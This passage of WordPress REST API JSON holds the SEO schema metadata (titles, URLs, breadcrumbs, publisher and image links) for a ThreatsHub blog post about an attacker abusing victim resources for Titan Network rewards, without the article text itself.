Network\",\"datePublished\":\"2024-10-30T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/\"},\"wordCount\":1620,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/TitanNetwork-thumbnail:Large?qlt=80\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/\",\"name\":\"Attacker Abuses Victim Resources to Reap Rewards from Titan Network 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/TitanNetwork-thumbnail:Large?qlt=80\",\"datePublished\":\"2024-10-30T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/#primaryimage\",\"url\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/TitanNetwork-thumbnail:Large?qlt=80\",\"contentUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/TitanNetwork-thumbnail:Large?qlt=80\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Attacker Abuses Victim Resources to Reap Rewards from Titan Network\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat 
IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH 
Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Attacker Abuses Victim Resources to Reap Rewards from Titan Network 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/","og_locale":"en_US","og_type":"article","og_title":"Attacker Abuses Victim Resources to Reap Rewards from Titan Network 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2024-10-30T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/TitanNetwork-thumbnail:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Attacker Abuses Victim Resources to Reap Rewards from Titan Network","datePublished":"2024-10-30T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/"},"wordCount":1620,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/TitanNetwork-thumbnail:Large?qlt=80","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Threats","Trend Micro Research : 
Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/","url":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/","name":"Attacker Abuses Victim Resources to Reap Rewards from Titan Network 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/TitanNetwork-thumbnail:Large?qlt=80","datePublished":"2024-10-30T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/#primaryimage","url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/TitanNetwork-thumbnail:Large?qlt=80","contentUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/TitanNetwork-thumbnail:Large?qlt=80"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Attacker Abuses Victim Resources to Reap Rewards from Titan Network"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - 
TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH 
Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57536","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=57536"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57536\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=57536"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=57536"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=57536"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}